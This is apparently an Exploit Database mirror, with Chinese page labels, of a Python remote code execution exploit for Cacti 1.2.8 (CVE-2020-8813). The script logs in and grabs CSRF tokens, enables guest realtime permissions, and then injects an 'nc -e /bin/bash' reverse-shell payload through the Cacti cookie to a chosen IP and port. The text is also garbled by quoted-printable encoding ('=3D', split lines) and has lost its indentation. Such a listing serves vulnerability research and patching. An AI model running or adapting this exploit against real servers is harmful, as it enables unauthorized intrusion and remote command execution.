Cacti 1.2.8 – Remote Code Execution

• Exploit Database
• 17 阅读

• 作者： Askar
  日期： 2020-02-24
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/48128/

• # Exploit Title: Cacti 1.2.8 - Remote Code Execution
  # Date: 2020-02-03
  # Exploit Author: Askar (@mohammadaskar2)
  # CVE: CVE-2020-8813
  # Vendor Homepage: https://cacti.net/
  # Version: v1.2.8
  # Tested on: CentOS 7.3 / PHP 7.1.33
  
  #!/usr/bin/python3
  
  import requests
  import sys
  import warnings
  from bs4 import BeautifulSoup
  from urllib.parse import quote
  
  warnings.filterwarnings("ignore", category=3DUserWarning, module=3D'bs4')
  
  
  if len(sys.argv) !=3D 6:
  print("[~] Usage : ./Cacti-exploit.py url username password ip port")
  exit()
  
  url =3D sys.argv[1]
  username =3D sys.argv[2]
  password =3D sys.argv[3]
  ip =3D sys.argv[4]
  port =3D sys.argv[5]
  
  def login(token):
  login_info =3D {
  "login_username": username,
  "login_password": password,
  "action": "login",
  "__csrf_magic": token
  }
  login_request =3D request.post(url+"/index.php", login_info)
  login_text =3D login_request.text
  if "Invalid User Name/Password Please Retype" in login_text:
  return False
  else:
  return True
  
  def enable_guest(token):
  request_info =3D {
  "id": "3",
  "section25": "on",
  "section7": "on",
  "tab": "realms",
  "save_component_realm_perms": 1,
  "action": "save",
  "__csrf_magic": token
  }
  enable_request =3D request.post(url+"/user_admin.php?header=3Dfalse", r=
  equest_info)
  if enable_request:
  return True
  else:
  return False
  
  def send_exploit():
  payload =3D ";nc${IFS}-e${IFS}/bin/bash${IFS}%s${IFS}%s" % (ip, port)
  cookies =3D {'Cacti': quote(payload)}
  requests.get(url+"/graph_realtime.php?action=3Dinit", cookies=3Dcookies=
  )
  
  request =3D requests.session()
  print("[+]Retrieving login CSRF token")
  page =3D request.get(url+"/index.php")
  html_content =3D page.text
  soup =3D BeautifulSoup(html_content, "html5lib")
  token =3D soup.findAll('input')[0].get("value")
  if token:
  print("[+]Token Found : %s" % token)
  print("[+]Sending creds ..")
  login_status =3D login(token)
  if login_status:
  print("[+]Successfully LoggedIn")
  print("[+]Retrieving CSRF token ..")
  page =3D request.get(url+"/user_admin.php?action=3Duser_edit&id=3D3=
  &tab=3Drealms")
  html_content =3D page.text
  soup =3D BeautifulSoup(html_content, "html5lib")
  token =3D soup.findAll('input')[1].get("value")
  if token:
  print("[+]Making some noise ..")
  guest_realtime =3D enable_guest(token)
  if guest_realtime:
  print("[+]Sending malicous request, check your nc ;)")
  send_exploit()
  else:
  print("[-]Error while activating the malicous account")
  
  else:
  print("[-] Unable to retrieve CSRF token from admin page!")
  exit()
  
  else:
  print("[-]Cannot Login!")
  else:
  print("[-] Unable to retrieve CSRF token!")
  exit()